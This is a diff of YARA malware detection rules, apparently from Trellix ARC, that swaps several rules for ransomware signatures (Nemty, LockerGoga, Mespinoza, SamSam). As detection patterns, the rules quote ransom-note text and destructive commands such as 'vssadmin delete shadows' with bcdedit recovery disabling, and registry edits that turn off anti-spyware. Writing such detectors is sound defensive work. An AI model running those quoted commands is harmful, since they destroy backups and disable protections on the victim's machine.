?32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C666462????6A??72??6633??35????????62????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??34??35????????30????3630??30??30????????????72??613B????5C6662????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????0A????666C6F6D69????????????31??????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C666462????6E6F72??6633??35????????62????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??0A????66??????69????????????31??????????62????69??????????69????????????6172??6574??5C6670??71??7B??2A??????6E6F73??20??32??6630??????????30??30????33??32??34??43616C69????????????5C6662????69????????????31??????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C6634??5C6662????69??????????6D616E5C6663????72??6574??33??5C6670??71??20??????6573??4E6577??526F6D616E20????3B????0A????6634??5C6662????69??????????6D616E5C6663????72??6574??30????6670??71??20??????6573??4E6577??526F6D616E20????72??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??3631??????72??32??5469????????????77??526F6D616E20????6565??????7B??6634??5C6662????69??????????6D616E5C6663????72??6574??3632??????72??32??5469????????????77??526F6D616E20??????3B????5C6634??5C6662????69??????????6D616E5C6663????72??6574??37375C6670??71??20??????6573??4E6577??526F6D616E20??486562????77??3B????0A????6634??5C6662????69??????????6D616E5C6663????72??6574??3738??????72??32??5469????????????77??526F6D616E20??4172??62????29??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??38??5C6670??71??20??????6573??4E6577??526F6D616E20????6C74??63??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??3633??????72??32??5469????????????77??526F6D616E20??5669????????????73??29??7D??0A????6631??32??????69??????????????6C5C6663????72??6574??5C6670??71??20????6D5375??20????73??6572??7B??2A??????6C74??5369????????????7D??5C6633??30??????69??????????????6D616E5C6663????72??6574??33??5C6670??71??20????6D62????6120????74??20????3B????5C6633??31??????69??????????????6D616E5C6663????72??6574??30????6670??71??20????6D62????6120????74??20????72??7D??5C6633??33??????69??????????????6D616E5C6663????72??6574??3631??????72??32??43616D62????6120????74??20????6565??????0D????????33??34??6662????69??????????6D616E5C6663????72??6574??3632??????72??32??43616D62????6120????74??20??????3B????5C6633??375C6662????69??????????6D616E5C6663????72??6574??38??5C6670??71??20????6D62????6120????74??20????6C74??63??7D??5C6633??38??????69??????????????6D616E5C6663????72??6574??3633??????72??32??43616D62????6120????74??20??5669????????????73??29??7D??5C6634??30??????69??????????????69????????????6172??6574??33??5C6670??71??20????6C69????????????3B????0A????6634??31??????69??????????????69????????????6172??6574??30????6670??71??20????6C69????????????72??7D??5C6634??33??????69??????????????69????????????6172??6574??3631??????72??32??43616C69????????????6565??????7B??6634??34??6662????69??????????69????????????6172??6574??3632??????72??32??43616C69????????????72??7D??5C6634??375C6662????69??????????69????????????6172??6574??38??5C6670??71??20????6C69????????????6C74??63??7D??0A????6634??38??????69??????????????69????????????6172??6574??3633??????72??32??43616C69????????????69????????????73??29??7D??5C6634??32??????69??????????????6C5C6663????72??6574??5C6670??71??20????2763????2763????2763????276535????????74??72??3B????5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??33??5C6670??71??20??????6573??4E6577??526F6D616E20????3B????0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??30????6670??71??20??????6573??4E6577??526F6D616E20????72??7D??5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3631??????72??32??5469????????????77??526F6D616E20????6565??????7B??666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3632??????72??32??5469????????????77??526F6D616E20??????3B????0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??37375C6670??71??20??????6573??4E6577??526F6D616E20??486562????77??3B????5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3738??????72??32??5469????????????77??526F6D616E20??4172??62????29??7D??5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??38??5C6670??71??20??????6573??4E6577??526F6D616E20????6C74??63??7D??0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3633??????72??32??5469????????????77??526F6D616E20??5669????????????73??29??7D??5C666462????6A??72??6633??35????????62????69??????????6C5C6663????72??6574??5C6670??71??20????6D5375??20????73??6572??7B??2A??????6C74??5369????????????7D??5C66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??33??5C6670??71??20????6D62????6120????3B????0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??30????6670??71??20????6D62????6120????72??7D??5C66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3631??????72??32??43616D62????6120????6565??????7B??66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3632??????72??32??43616D62????6120??????3B????0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??38??5C6670??71??20????6D62????6120????6C74??63??7D??5C66??????616A?? }
+		$x1 = "C:\\Windows\\system32\\cmd.exe" fullword wide
+		$s1 = "and a Proof of Payment together will be ignored. We will drop the backup after 24 hours. You are welcome! " fullword ascii
+		$s2 = "Your File and DataBase is downloaded and backed up on our secured servers. To recover your lost data : Send 0.1 BTC to our BitCoin" ascii
+		$s3 = "No valid port number in connect to host string (%s)" fullword ascii
+		$s4 = "SOCKS4%s: connecting to HTTP proxy %s port %d" fullword ascii
+		$s5 = "# https://curl.haxx.se/docs/http-cookies.html" fullword ascii
+		$s6 = "Connection closure while negotiating auth (HTTP 1.0?)" fullword ascii
+		$s7 = "detail may be available in the Windows System event log." fullword ascii
+		$s8 = "Found bundle for host %s: %p [%s]" fullword ascii
+		$s9 = "No valid port number in proxy string (%s)" fullword ascii
+		$op0 = { 50 8d 85 78 f6 ff ff 50 ff b5 70 f6 ff ff ff 15 }
+		$op1 = { 83 fb 01 75 45 83 7e 14 08 72 34 8b 0e 66 8b 45 }
+		$op2 = { c7 41 0c df ff ff ff c7 41 10 }
 
 	condition:
-		uint16( 0 ) == 0x5c7b and filesize < 100KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Rovnix_Downloader : DOWNLOADER
+
+rule TRELLIX_ARC_Ransom_Mespinoza : FILE
 {
 	meta:
-		description = "Rovnix downloader with sinkhole checks"
-		author = "Intel Security"
-		id = "d51f8f73-7a3a-5ccf-9122-86061b5399f1"
-		date = "2026-02-01"
-		modified = "2020-08-14"
-		reference = "https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_Rovnix.yar#L1-L38"
+		description = "rule to detect Mespinoza ransomware"
+		author = "Christiaan Beek @ McAfee ATR"
+		id = "70a76bc4-e0cb-5caa-bb64-1a732349d2ce"
+		date = "2020-11-24"
+		modified = "2020-11-24"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Mespinoza.yar#L3-L27"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "52cde40c95436129b7d48b4bd5e78b66deb84fdc84a76cc9ac72f24e0777e540"
+		logic_hash = "e245fb9a71d86209690a6f4c7aa38c10dbd32cda2ea3ecde08d0d94e896381cb"
 		score = 75
-		quality = 43
-		tags = "DOWNLOADER"
-		malware_type = "downloader"
-		malware_family = "Downloader:W32/Rovnix"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		quality = 70
+		tags = "FILE"
+		malware_family = "ransom_Win_Mespinoza"
+		hash1 = "e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead"
+		hash2 = "48355bd2a57d92e017bdada911a4b31aa7225c0b12231c9cbda6717616abaea3"
+		hash3 = "e4287e9708a73ce6a9b7a3e7c72462b01f7cc3c595d972cf2984185ac1a3a4a8"
 
 	strings:
-		$sink1 = "control"
-		$sink2 = "sink"
-		$sink3 = "hole"
-		$sink4 = "dynadot"
-		$sink5 = "block"
-		$sink6 = "malw"
-		$sink7 = "anti"
-		$sink8 = "googl"
-		$sink9 = "hack"
-		$sink10 = "trojan"
-		$sink11 = "abuse"
-		$sink12 = "virus"
-		$sink13 = "black"
-		$sink14 = "spam"
-		$boot = "BOOTKIT_DLL.dll"
-		$mz = { 4D 5A }
+		$s1 = "update.bat" fullword ascii
+		$s2 = "protonmail.com" fullword ascii
+		$s3 = "Every byte on any types of your devices was encrypted." fullword ascii
+		$s4 = "To get all your data back contact us:" fullword ascii
+		$s5 = "What to do to get all data back?" fullword ascii
+		$s6 = "Don't try to use backups because it were encrypted too." fullword ascii
+		$op0 = { 83 f8 4b 75 9e 0f be 46 ff 8d 4d e0 ff 34 85 50 }
+		$op1 = { c6 05 34 9b 47 00 00 e8 1f 0c 03 00 59 c3 cc cc }
+		$op2 = { e8 ef c5 fe ff b8 ff ff ff 7f eb 76 8b 4d 0c 85 }
 
 	condition:
-		$mz in ( 0 .. 2 ) and all of ( $sink* ) and $boot
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and pe.imphash ( ) == "b5e8bd2552848bb7bf2f28228d014742" and ( 8 of them ) and 2 of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Screenlocker_5H311_1Nj3C706 : SCREENLOCKER FILE
+rule TRELLIX_ARC_Lockergogaransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the screenlocker 5h311_1nj3c706"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "50bbe8e1-4721-5277-b786-d2a2d9acf917"
-		date = "2018-08-07"
+		description = "LockerGoga Ransomware"
+		author = "Christiaan Beek - McAfee ATR team"
+		id = "bdf5da34-adf0-5731-820f-96511e647a83"
+		date = "2019-03-20"
 		modified = "2020-08-14"
-		reference = "https://twitter.com/demonslay335/status/1038060120461266944"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_screenlocker_5h311_1nj3c706.yar#L1-L33"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_LockerGoga.yar#L1-L36"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "016ee638bd4fccd5ca438c2e0abddc4b070f59269c08f11c5313ba9c37190718"
-		logic_hash = "61b4495841c77053ba2631f087197719f3ee45cd93add022f23b87ece8563619"
+		hash = "ba15c27f26265f4b063b65654e9d7c248d0d651919fafb68cb4765d1e057f93f"
+		logic_hash = "165fa0fa044b2e0d2344626c2064162f23e13dc17310a772b703dbbe9457bd99"
 		score = 75
 		quality = 70
-		tags = "SCREENLOCKER, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "screenlocker"
-		malware_family = "ScreenLocker:W32/5h311_1nj3c706"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/LockerGoga"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "C:\\Users\\Hoang Nam\\source\\repos\\WindowsApp22\\WindowsApp22\\obj\\Debug\\WindowsApp22.pdb" fullword ascii
-		$s2 = "cmd.exe /cREG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\ActiveDesktop /v NoChangingWallPaper /t REG_DWOR" wide
-		$s3 = "C:\\Users\\file1.txt" fullword wide
-		$s4 = "C:\\Users\\file2.txt" fullword wide
-		$s5 = "C:\\Users\\file.txt" fullword wide
-		$s6 = " /v Wallpaper /t REG_SZ /d %temp%\\IMG.jpg /f" fullword wide
-		$s7 = " /v DisableAntiSpyware /t REG_DWORD /d 1 /f" fullword wide
-		$s8 = "All your file has been locked. You must pay money to have a key." fullword wide
-		$s9 = "After we receive Bitcoin from you. We will send key to your email." fullword wide
+		$1 = "boost::interprocess::spin_recursive_mutex recursive lock overflow" fullword ascii
+		$2 = ".?AU?$error_info_injector@Usync_queue_is_closed@concurrent@boost@@@exception_detail@boost@@" fullword ascii
+		$3 = ".?AV?$CipherModeFinalTemplate_CipherHolder@V?$BlockCipherFinal@$00VDec@RC6@CryptoPP@@@CryptoPP@@VCBC_Decryption@2@@CryptoPP@@" fullword ascii
+		$4 = "?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v" fullword ascii
+		$5 = "cipher.exe" fullword ascii
+		$6 = ".?AU?$placement_destroy@Utrace_queue@@@ipcdetail@interprocess@boost@@" fullword ascii
+		$7 = "3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%" fullword ascii
+		$8 = "CreateProcess failed" fullword ascii
+		$9 = "boost::dll::shared_library::load() failed" fullword ascii
+		$op1 = { 8b df 83 cb 0f 81 fb ff ff ff 7f 76 07 bb ff ff }
+		$op2 = { 8b df 83 cb 0f 81 fb ff ff ff 7f 76 07 bb ff ff }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 6 of them ) and all of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Alina_POS_PDB : POS FILE
+rule TRELLIX_ARC_Nemty_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Alina POS"
+		description = "Rule to detect Nemty Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "9588aa10-d5e4-55f4-998c-a01503a53d3a"
-		date = "2013-08-08"
+		id = "e9b133d6-fd77-5201-995d-c42bae7cde46"
+		date = "2020-02-23"
 		modified = "2020-08-14"
-		reference = "https://www.pandasecurity.com/mediacenter/pandalabs/alina-pos-malware/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_alina_pos_pdb.yar#L1-L25"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Nemty.yar#L1-L45"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "28b0c52c0630c15adcc857d0957b3b8002a4aeda3c7ec40049014ce33c7f67c3"
-		logic_hash = "9bb8260e3a47567e2460dd474fb74e57987e3d79eb30cdbc2a45b88a16ba1ca2"
+		hash = "73bf76533eb0bcc4afb5c72dcb8e7306471ae971212d05d0ff272f171b94b2d4"
+		logic_hash = "d055286670516318c14dcf4e5873b96eede5e1dfb3ee978553fc11f1ac6b3252"
 		score = 75
 		quality = 70
-		tags = "POS, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "pos"
-		malware_family = "Pos:W32/Alina"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Nemty"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\Users\\dice\\Desktop\\SRC_adobe\\src\\grab\\Release\\Alina.pdb"
+		$x1 = "/c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default}" fullword ascii
+		$s2 = "https://pbs.twimg.com/media/Dn4vwaRW0AY-tUu.jpg:large :D" fullword ascii
+		$s3 = "MSDOS.SYS" fullword wide
+		$s4 = "/c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} " ascii
+		$s5 = "recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete" fullword ascii
+		$s6 = "DECRYPT.txt" fullword ascii
+		$s7 = "pv3mi+NQplLqkkJpTNmji/M6mL4NGe5IHsRFJirV6HSyx8mC8goskf5lXH2d57vh52iqhhEc5maLcSrIKbukcnmUwym+In1OnvHp070=" fullword ascii
+		$s8 = "\\NEMTY-DECRYPT.txt\"" fullword ascii
+		$s9 = "rfyPvccxgVaLvW9OOY2J090Mq987N9lif/RoIDP89luS9Ouv9gUImpgCTVGWvJzrqiS8hQ5El02LdEvKcJ+7dn3DxiXSNG1PwLrY59KzGs/gUvXnYcmT6t34qfZmr8g8" ascii
+		$s10 = "IO.SYS" fullword wide
+		$s11 = "QgzjKXcD1Jh/cOLBh1OMb+rWxUbToys2ArG9laNWAWk0rNIv2dnIDpc+mSbp91E8qVN8Mv8K5jC3EBr4TB8jh5Ns/onBhPZ9rLXR7wIkaXGeTZi/4/XOtO3DFiad4+vf" ascii
+		$s12 = "NEMTY-DECRYPT.txt" fullword wide
+		$s13 = "pvXmjPQRoUmjj0g9QZ24wvEqyvcJVvFWXc0LL2XL5DWmz8me5wElh/48FHKcpbnq8C2kwQ==" fullword ascii
+		$s14 = "a/QRAGlNLvqNuONkUWCQTNfoW45DFkZVjUPn0t3tJQnHWPhJR2HWttXqYpQQIMpn" fullword ascii
+		$s15 = "KeoJrLFoTgXaTKTIr+v/ObwtC5BKtMitXq8aaDT8apz98QQvQgMbncLSJWJG+bHvaMhG" fullword ascii
+		$s16 = "pu/hj6YerUnqlUM9A8i+i/UhnvsIE+9XTYs=" fullword ascii
+		$s17 = "grQkLxaGvL0IBGGCRlJ8Q4qQP/midozZSBhFGEDpNElwvWXhba6kTH1LoX8VYNOCZTDzLe82kUD1TSAoZ/fz+8QN7pLqol5+f9QnCLB9QKOi0OmpIS1DLlngr9YH99vt" ascii
+		$s18 = "BOOTSECT.BAK" fullword wide
+		$s19 = "bbVU/9TycwPO+5MgkokSHkAbUSRTwcbYy5tmDXAU1lcF7d36BTpfvzaV5/VI6ARRt2ypsxHGlnOJQUTH6Ya//Eu0jPi/6s2MmOk67csw/msiaaxuHXDostsSCC+kolVX" ascii
+		$s20 = "puh4wXjVYWJzFN6aIgnClL4W/1/5Eg6bm5uEv6Dru0pfOvhmbF1SY3zav4RQVQTYMfZxAsaBYfJ+Gx+6gDEmKggypl1VcVXWRbxAuDIXaByh9aP4B2QvhLnJxZLe+AG5" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) and 4 of them ) )
 }
-rule TRELLIX_ARC_MALW_Emotet : FINANCIAL FILE
+rule TRELLIX_ARC_Nemty_Ransomware_2_6 : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect unpacked Emotet"
+		description = "Rule to detect Nemty Ransomware version 2.6"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "5bc83065-dfdd-56b7-9983-200bff35c8b1"
-		date = "2020-07-21"
+		id = "335dff33-d078-58ba-b68b-a949895b710f"
+		date = "2020-04-06"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_emotet.yar#L1-L32"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Nemty.yar#L47-L80"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "223e4453a6c3b56b0bc0f91147fa55ea59582d64b8a5c08f1f8d06026044065e"
+		hash = "52b7d20d358d1774a360bb3897a889e14d416c3b2dff26156a506ff199c3388d"
+		logic_hash = "dacf709838ef2ef65d25bdbbd92007ab46a95953031d7bee75eac046f670171a"
 		score = 75
 		quality = 70
-		tags = "FINANCIAL, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "financial"
-		malware_family = "Backdoor:W32/Emotet"
-		actor_type = "Cybercrime"
-		hash1 = "a6621c093047446e0e8ae104769af93a5a8ed147ab8865afaafbbd22adbd052d"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Nemty"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pattern_0 = { 8b45fc 8be5 5d c3 55 8bec }
-		$pattern_1 = { 3c39 7e13 3c61 7c04 3c7a 7e0b 3c41 }
-		$pattern_2 = { 7c04 3c39 7e13 3c61 7c04 3c7a 7e0b }
-		$pattern_3 = { 5f 8bc6 5e 5b 8be5 }
-		$pattern_4 = { 5f 668906 5e 5b }
-		$pattern_5 = { 3c30 7c04 3c39 7e13 3c61 7c04 }
-		$pattern_6 = { 53 56 57 8bfa 8bf1 }
-		$pattern_7 = { 3c39 7e13 3c61 7c04 3c7a 7e0b }
-		$pattern_8 = { 55 8bec 83ec14 53 }
-		$pattern_9 = { 5e 8be5 5d c3 55 8bec }
+		$pattern = { 558B??83????53565789????29????6A??8D????8D????5A8B??89????8A????88????8B????8A????88??8A????88????8A??88????03??03??FF????75??89????8D????8D????8D????89????89????29????89????29????89????29????8D????8D????89????29????89????29????8B????89????29????8D????F6??????8B????8A????8B????8A????8A??88????8B????8A????88????75??0FB6??8A??????????0FB6??88????8A??????????0FB6????8A??????????88????0FB6????8A??????????88????8B????C1????32??????????8B????8A????32??8B????88????8A????32??88????8A??32????83????88????8B????8A????32????FF????88??83????83????83??????0F82????????5F5E5BC9C3558B??560FB6??57C1????03????6A??5F6A??5E8A??30??40414E75??4F75??5F5E5DC356576A??5F6A??8B??5E0FB6??8A??????????88??83????4E75??414F75??5F5EC38A????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????88????C3558B??5153566A??83????5E8A????32??8A????8A????88????32??32??88????88????32??8A??C0????B3??F6??02??32??32????8A????32????32??88????8A??C0????F6??02??32??32????8A????32????88????8A??C0????F6??02??32??32??8A????32????32????88??8A??C0????F6??02??32??32????83????32????4E88????75??5E5BC9C3558B??53FF????8B??32??E8????????59B3??8B??E8????????8B??E8????????8B??E8????????FF????8B??8A??E8????????FE??5980????72??8B??E8????????8B??E8????????5B8B??B0??5DE9????????558B??81??????????A1????????33??89????8B????578D??????????89??????????E8????????33??6A??5839????76??5683????75??508D????5350E8????????8D??????????508D????E8????????83????6A??5880??????75??C6??????4879??EB??FE????33??8A??????8B??????????30????47403B????72??5E8B????33??5FE8????????C9C3558B??51515333??5633??32??89????39????0F86????????578B????8B????8A????8B??83????74??4F74??4F75??21????0FB6??0FB6??83????8B??C1????C1????0B??8A??????????83????88????8A??????????8B????88??????83????EB??0FB6??0FB6??83????6A??C1????C1????5E0B??EB??33??0FB6??46C1????8A??????????88????40FF????8A??8B????3B????72??5F4E74??4E75??0FB6??83????8A????????????88????C6????????83????EB??0FB6??83????C1????8A??????????88????66????????????83????5EC6??????5BC9C3558B??33??F6??????75??5733??39????76??8B????8A????80????74??80????7C??80????7F??0FB6??8A??????????80????74??8B??83????83????74??4A74??4A74??4A75??08????40EB??8A??C0????80????08????40C0????EB??8A??C0????80????08????40C0????EB??C0????88????473B????72??EB??33??5F5DC3558B??518B??85??74??8B????568B??89????3B??74??576A??33??E8????????83????3B????75??5FFF??E8????????595E33??89??89????89????C9C3558B??80??????74??83??????72??538B??85??74??575356E8????????83????53E8????????595BC7????????????89????C6??????5DC2????C7??????????E9????????558B??568B??C7??????????E8????????F6??????74??56E8????????598B??5E5DC2????558B??83????81??????????A1????????33??89????????????5356578D????508D??????E8????????68????????8D????????????E8????????6A??5F33??83????66????????8D????8B??33??5089??????89??????E8????????E8????????33??66????????8B????????????03??????83????8D??????89??????89??????E8????????538D??????5083????8D??????E8????????538D????????????5083????E8????????8B??8D??????E8????????6A??33??E8????????83????????8B??????73??8D??????8D????????????5150FF??????????89??????83????0F84????????8B??????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????F6??????????????8D????????????508D??????8D??????74??E8????????598D??????51E8????????8B??598D??????E8????????6A??33??8D??????E8????????6A??8D??????E8????????83????8D??????8B??50E8????????E8????????83????E9????????E8????????8B??598D??????E8????????6A??33??8D??????E8????????8D????????????50FF??????????508D??????E8????????8B??????6A??5F39??????73??8D??????8B??????????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??74??8B??????39??????73??8D??????68????????50FF??85??74??83????8B??68????????E8????????83????8D????????????8B??51E8????????E8????????83????85??75??8B??????39??????73??8D??????83????8B??51E8????????E8????????83????6A??33??8D??????E8????????8D????????????50FF??????FF??????????85??0F85????????FF??????FF??????????33??435333??8D?????? }
 
 	condition:
-		7 of them and filesize < 180224
+		uint16( 0 ) == 0x5a4d and filesize < 1500KB and $pattern
 }
-rule TRELLIX_ARC_Festi_Botnet_Pdb : BOTNET FILE
+
+rule TRELLIX_ARC_Samsamransom2016 : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the Festi botnet based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "02f4149d-b8ac-5852-8cbe-c47f4cddcba6"
-		date = "2013-03-04"
+		description = "No description has been set in the source file - Trellix ARC"
+		author = "Christiaan Beek | McAfee ATR Team"
+		id = "1c7985d0-d01c-52f7-8819-e038ccc01212"
+		date = "2018-01-25"
 		modified = "2020-08-14"
-		reference = "https://www.welivesecurity.com/2012/05/11/king-of-spam-festi-botnet-analysis/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_festi_botnet_pdb.yar#L1-L25"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_SamSam.yar#L3-L52"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "e55913523f5ae67593681ecb28d0fa1accee6739fdc3d52860615e1bc70dcb99"
-		logic_hash = "46e2576900fe94d614a683d4f09079b7ac78654079b2e558d076bcb42db4bf11"
+		logic_hash = "9e8034ec0ded82ad82b625d6d1b9918761decef0fd42a253722cdc620b355e1a"
 		score = 75
-		quality = 70
-		tags = "BOTNET, FILE"
+		quality = 68
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "botnet"
-		malware_family = "Botnet:W32/Festi"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/SamSam"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "45e00fe90c8aa8578fce2b305840e368d62578c77e352974da6b8f8bc895d75b"
 
 	strings:
-		$pdb = "\\eclipse\\botnet\\drivers\\Bin\\i386\\kernel.pdb"
+		$x1 = "Could not list processes locking resource. Failed to get size of result." fullword wide
+		$s2 = "Could not list processes locking resource." fullword wide
+		$s3 = "samsam.del.exe" fullword ascii
+		$s4 = "samsam.exe" fullword wide
+		$s5 = "RM_UNIQUE_PROCESS" fullword ascii
+		$s6 = "KillProcessWithWait" fullword ascii
+		$s7 = "killOpenedProcessTree" fullword ascii
+		$s8 = "RM_PROCESS_INFO" fullword ascii
